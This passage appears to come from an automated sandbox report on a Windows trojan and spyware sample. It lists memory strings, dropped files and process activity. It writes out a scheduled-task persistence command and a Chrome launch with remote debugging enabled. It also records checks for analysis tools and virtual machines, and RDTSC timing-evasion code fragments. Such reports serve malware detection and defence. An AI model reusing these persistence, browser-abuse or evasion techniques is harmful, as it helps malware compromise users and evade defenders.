Source: chrome.exe, 00000003.00000002.2481309311.0000002400BB0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/search?ei=&fr=crmas&p=
Source: chrome.exe, 00000003.00000002.2481309311.0000002400BB0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/search?ei=&fr=crmas&p=searchTerms
Source: chrome.exe, 00000003.00000002.2479601385.00000024006B0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: chrome.exe, 00000003.00000003.2466831182.00000024004B4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.2477505295.000000240001C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://chrome.google.com/webstore
Source: chrome.exe, 00000003.00000002.2479412191.0000002400664000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://chrome.google.com/webstore$
Source: chrome.exe, 00000003.00000002.2479601385.00000024006B0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://chrome.google.com/webstore206E5
Source: chrome.exe, 00000003.00000002.2479412191.0000002400664000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.2478074584.00000024001C4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.2480685635.00000024009E0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.2480994407.0000002400AC0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://chrome.google.com/webstore?hl=en
Source: chrome.exe, 00000003.00000003.2474943627.0000002400C80000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.2478444505.000000240031C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.2480290120.00000024008A8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000003.2470974710.0000002400494000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000003.2471104703.0000002400CA0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000003.2474036570.0000002400CA0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://chrome.google.com/webstoreLDDiscover
Source: chrome.exe, 00000003.00000002.2497650379.00000BD80078C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://chromekanonymity-pa.googleapis.com/
Source: chrome.exe, 00000003.00000003.2457686138.00000BD80039C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000003.2457493215.00000BD800390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.2498157254.00000BD80080C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://chromekanonymity-pa.googleapis.com/2%
Source: chrome.exe, 00000003.00000002.2497650379.00000BD80078C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://chromekanonymityauth-pa.googleapis.com/
Source: chrome.exe, 00000003.00000003.2457686138.00000BD80039C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000003.2457493215.00000BD800390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.2498157254.00000BD80080C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://chromekanonymityauth-pa.googleapis.com/2$
Source: chrome.exe, 00000003.00000002.2497650379.00000BD80078C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://chromekanonymityauth-pa.googleapis.com/KAnonymityServiceJoinRelayServerhttps://chromekanonym
Source: chrome.exe, 00000003.00000002.2497650379.00000BD80078C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000003.2459185048.00000BD800684000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://chromekanonymityquery-pa.googleapis.com/
Source: chrome.exe, 00000003.00000003.2457686138.00000BD80039C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000003.2457493215.00000BD800390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.2498157254.00000BD80080C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://chromekanonymityquery-pa.googleapis.com/2O
Source: chrome.exe, 00000003.00000002.2478126449.000000240020C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://chromereporting-pa.googleapis.com/v1/events
Source: chrome.exe, 00000003.00000002.2478126449.000000240020C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://chromereporting-pa.googleapis.com/v1/record
Source: chrome.exe, 00000003.00000002.2477505295.000000240001C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://chromewebstore.google.com/
Source: chrome.exe, 00000003.00000002.2482277670.0000002400E6C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://chromium-i18n.appspot.com/ssl-aggregate-address/
Source: chrome.exe, 00000003.00000002.2478074584.00000024001C4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://classroom.googleapis.com/
Source: chrome.exe, 00000003.00000002.2478074584.00000024001C4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://classroom.googleapis.com/g
Source: chrome.exe, 00000003.00000003.2454014953.00001214002E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000003.2453991229.00001214002D8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://clients2.google.com/cr/report
Source: chrome.exe, 00000003.00000002.2478074584.00000024001C4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000003.2466831182.00000024004B4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.2480559941.0000002400988000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.2479834357.000000240071C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.2477505295.000000240001C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://clients2.google.com/service/update2/crx
Source: chrome.exe, 00000003.00000002.2479834357.000000240071C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.2481160056.0000002400B1C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://clients2.google.com/service/update2/crx?os=win&arch=x64&os_arch=x86_64&nacl_arch=x86-64&prod
Source: chrome.exe, 00000003.00000002.2480637100.00000024009BC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://clients3.google.com/cast/chromecast/home/wallpaper/collection-images?rt=b
Source: chrome.exe, 00000003.00000002.2480637100.00000024009BC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://clients3.google.com/cast/chromecast/home/wallpaper/collections?rt=b
Source: chrome.exe, 00000003.00000002.2479884633.0000002400750000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://clients3.google.com/cast/chromecast/home/wallpaper/image?rt=b
Source: chrome.exe, 00000003.00000002.2478074584.00000024001C4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://clients4.google.com/chrome-sync
Source: chrome.exe, 00000003.00000002.2478074584.00000024001C4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://clients4.google.com/chrome-sync/event
Source: chrome.exe, 00000003.00000002.2479412191.0000002400664000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.2481309311.0000002400BB0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://clientservices.googleapis.com/chrome-variations/seed?osname=win&channel=stable&milestone=117
Source: file.exe, 00000000.00000003.2116332717.00000000076A2000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://curl.se/docs/alt-svc.html
Source: file.exe, 00000000.00000003.2116332717.00000000076A2000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://curl.se/docs/hsts.html
Source: file.exe, 00000000.00000003.2116332717.00000000076A2000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://curl.se/docs/http-cookies.html
Source: chrome.exe, 00000003.00000002.2478444505.000000240031C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://docs.google.
Source: chrome.exe, 00000003.00000003.2466831182.00000024004B4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/
Source: chrome.exe, 00000003.00000002.2480404813.0000002400921000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/document/:
Source: chrome.exe, 00000003.00000002.2480404813.0000002400921000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/document/?usp=installed_webapp
Source: chrome.exe, 00000003.00000002.2480404813.0000002400921000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/document/J
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49780
Source: unknown Network traffic detected: HTTP traffic on port 49780 -> 443
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 9_2_6C5F9D11 OpenClipboard,GlobalAlloc,GlobalLock,strcpy,GlobalUnlock,EmptyClipboard,SetClipboardData,CloseClipboard, 9_2_6C5F9D11
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 9_2_6C5F9E27 GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard, 9_2_6C5F9E27

System Summary

Source: C:\Users\user\Desktop\file.exe File dump: service123.exe.0.dr 314617856 Jump to dropped file
Source: file.exe Static PE information: section name:
Source: file.exe Static PE information: section name: .rsrc
Source: file.exe Static PE information: section name: .idata
Source: file.exe Static PE information: section name:
Source: C:\Users\user\Desktop\file.exe Process Stats: CPU usage > 49%
Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Local\Temp\service123.exe 05466AC3A1F09726E552D0CBF3BAC625A7EB7944CEDF812F60B066DCBD74AFB1
Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 2828 -s 1296
Source: file.exe Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
Source: file.exe Static PE information: Section: gdiujpci ZLIB complexity 0.994316652913318
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@18/7@10/4
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\DGdQGkLyQR Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe Mutant created: \Sessions\1\BaseNamedObjects\JStVXPURjEhqLJtWBhCN
Source: C:\Windows\SysWOW64\WerFault.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess2828
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5448:120:WilError_03
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Temp\service123.exe Jump to behavior
Source: C:\Users\user\Desktop\file.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: C:\Users\user\Desktop\file.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: chrome.exe, 00000003.00000002.2479777159.0000002400715000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: CREATE TABLE psl_extensions (domain VARCHAR NOT NULL, UNIQUE (domain));
Source: file.exe ReversingLabs: Detection: 36%
Source: unknown Process created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
Source: C:\Users\user\Desktop\file.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9222 --profile-directory="Default"
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2392 --field-trial-handle=2316,i,660778272520788295,10458363181096637325,262144 /prefetch:8
Source: C:\Users\user\Desktop\file.exe Process created: C:\Users\user\AppData\Local\Temp\service123.exe "C:\Users\user\AppData\Local\Temp\service123.exe"
Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /tn "ServiceData4" /tr "C:\Users\user\AppData\Local\Temp\/service123.exe" /st 00:01 /du 9800:59 /sc once /ri 1 /f
Source: C:\Windows\SysWOW64\schtasks.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 2828 -s 1296
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\service123.exe C:\Users\user\AppData\Local\Temp\/service123.exe
Source: C:\Users\user\Desktop\file.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9222 --profile-directory="Default" Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2392 --field-trial-handle=2316,i,660778272520788295,10458363181096637325,262144 /prefetch:8 Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: dhcpcsvc6.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: dhcpcsvc.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: napinsp.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: pnrpnsp.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: wshbth.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: nlaapi.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: winrnr.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: windowscodecs.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: rstrtmgr.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe Section loaded: unmycipohmxnjqoesrey.dll Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: taskschd.dll Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: xmllite.dll Jump to behavior
Source: file.exe Static file information: File size 4385280 > 1048576
Source: file.exe Static PE information: Raw size of is bigger than: 0x100000 < 0x277800
Source: file.exe Static PE information: Raw size of gdiujpci is bigger than: 0x100000 < 0x1b3800
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 9_2_002D8230 LoadLibraryA,GetProcAddress,FreeLibrary,GetLastError, 9_2_002D8230
Source: initial sample Static PE information: section where entry point is pointing to: .taggant
Source: file.exe Static PE information: real checksum: 0x436c61 should be: 0x434ca1
Source: file.exe Static PE information: section name:
Source: file.exe Static PE information: section name: .rsrc
Source: file.exe Static PE information: section name: .idata
Source: file.exe Static PE information: section name:
Source: file.exe Static PE information: section name: gdiujpci
Source: file.exe Static PE information: section name: zdypqqxr
Source: file.exe Static PE information: section name: .taggant
Source: service123.exe.0.dr Static PE information: section name: .eh_fram
Source: unmYCIPOHmXNjqOesrEy.dll.0.dr Static PE information: section name: .eh_fram
Source: file.exe Static PE information: section name: gdiujpci entropy: 7.954839612403231
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Temp\unmYCIPOHmXNjqOesrEy.dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Temp\service123.exe Jump to dropped file

Boot Survival

Source: C:\Users\user\Desktop\file.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window searched: window name: Regmonclass Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window searched: window name: Filemonclass Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /tn "ServiceData4" /tr "C:\Users\user\AppData\Local\Temp\/service123.exe" /st 00:01 /du 9800:59 /sc once /ri 1 /f
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion

Source: C:\Users\user\AppData\Local\Temp\service123.exe Evasive API call chain: CreateMutex,DecisionNodes,Sleep
Source: C:\Users\user\AppData\Local\Temp\service123.exe Stalling execution: Execution stalls by calling Sleep
Source: C:\Users\user\Desktop\file.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FF8A40 second address: FF8A44 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FF8A44 second address: FF8A8F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC85CDF02B7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a xor dword ptr [esp], 2D402C0Eh 0x00000011 movzx edi, ax 0x00000014 lea ebx, dword ptr [ebp+1245759Ah] 0x0000001a mov edi, dword ptr [ebp+122D3653h] 0x00000020 xchg eax, ebx 0x00000021 push edx 0x00000022 jmp 00007FC85CDF02B1h 0x00000027 pop edx 0x00000028 push eax 0x00000029 pushad 0x0000002a push edx 0x0000002b push eax 0x0000002c push edx 0x0000002d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FF8A8F second address: FF8A97 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FF8B38 second address: FF8B3C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FF8B3C second address: FF8BCA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 add dword ptr [esp], 4CD11BD2h 0x0000000e mov edx, 7C755018h 0x00000013 push 00000003h 0x00000015 mov ecx, 0709D4B9h 0x0000001a push 00000000h 0x0000001c push 00000000h 0x0000001e push edx 0x0000001f call 00007FC85D338E28h 0x00000024 pop edx 0x00000025 mov dword ptr [esp+04h], edx 0x00000029 add dword ptr [esp+04h], 00000017h 0x00000031 inc edx 0x00000032 push edx 0x00000033 ret 0x00000034 pop edx 0x00000035 ret 0x00000036 sub di, 7511h 0x0000003b push 00000003h 0x0000003d mov edi, dword ptr [ebp+122D2D27h] 0x00000043 push A6E02962h 0x00000048 pushad 0x00000049 jng 00007FC85D338E28h 0x0000004f pushad 0x00000050 pushad 0x00000051 popad 0x00000052 push eax 0x00000053 pop eax 0x00000054 popad 0x00000055 popad 0x00000056 add dword ptr [esp], 191FD69Eh 0x0000005d add dword ptr [ebp+122D25F0h], ebx 0x00000063 lea ebx, dword ptr [ebp+124575A5h] 0x00000069 and esi, dword ptr [ebp+122D29B2h] 0x0000006f push eax 0x00000070 push eax 0x00000071 push edx 0x00000072 jmp 00007FC85D338E35h 0x00000077 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1019323 second address: 1019328 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1019328 second address: 1019331 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 pushad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FF0868 second address: FF08A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007FC85CDF02A6h 0x0000000a jno 00007FC85CDF02A6h 0x00000010 popad 0x00000011 jmp 00007FC85CDF02AEh 0x00000016 popad 0x00000017 push eax 0x00000018 push edx 0x00000019 je 00007FC85CDF02B2h 0x0000001f jmp 00007FC85CDF02ACh 0x00000024 push eax 0x00000025 push edx 0x00000026 jnp 00007FC85CDF02A6h 0x0000002c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FF08A4 second address: FF08AC instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 10176C5 second address: 10176E6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 jnc 00007FC85CDF02BCh 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 10176E6 second address: 10176EE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 10176EE second address: 10176F4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 10182CF second address: 10182E5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC85D338E30h 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1018A27 second address: 1018A31 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007FC85CDF02A6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1018A31 second address: 1018A4A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 jg 00007FC85D338E26h 0x0000000f jne 00007FC85D338E26h 0x00000015 push ebx 0x00000016 pop ebx 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1018B96 second address: 1018BAA instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FC85CDF02A8h 0x00000008 push eax 0x00000009 push edx 0x0000000a jl 00007FC85CDF02A6h 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1018BAA second address: 1018BC6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jo 00007FC85D338E67h 0x0000000e push eax 0x0000000f push edx 0x00000010 jp 00007FC85D338E26h 0x00000016 jne 00007FC85D338E26h 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1018BC6 second address: 1018BDB instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jng 00007FC85CDF02A6h 0x0000000d jng 00007FC85CDF02A6h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1018E98 second address: 1018EB4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC85D338E38h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1018EB4 second address: 1018EB8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 101A73F second address: 101A743 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 101A743 second address: 101A75C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FC85CDF02AFh 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 101A75C second address: 101A762 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 101A762 second address: 101A771 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 jnp 00007FC85CDF02A6h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 101FE46 second address: 101FE4D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 101FF14 second address: 101FF18 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 10239CC second address: 10239D0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1023C62 second address: 1023C66 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 10240E9 second address: 10240ED instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 102634B second address: 102634F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1026753 second address: 1026758 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 10269C3 second address: 10269C9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 10269C9 second address: 10269D3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jne 00007FC85D338E26h 0x0000000a rdtsc
